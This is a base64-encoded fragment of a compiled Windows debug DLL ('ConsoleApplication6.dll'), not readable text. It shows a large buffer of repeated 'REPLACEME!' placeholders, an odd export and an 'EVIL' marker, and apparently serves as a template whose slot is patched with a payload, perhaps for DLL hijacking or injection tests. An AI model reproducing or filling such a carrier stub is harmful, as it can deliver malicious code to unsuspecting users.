QTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIVJFUExBQ0VNRSFSRVBMQUNFTUUhUkVQTEFDRU1FIQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA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AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAF4RAYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGQQAYABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABKAUFEQMOARkAB3AGUAAAAAAAAAEtBQUWAxMBGQAMcAtQAAAAAAAAATEFBRoDFwEbABBwD1AAAAAAAAABHAUFDQMKARkAA3ACUAAAAAAAAAEqBSUTIw4BIQAHcAZQAAAAAAAAAQQ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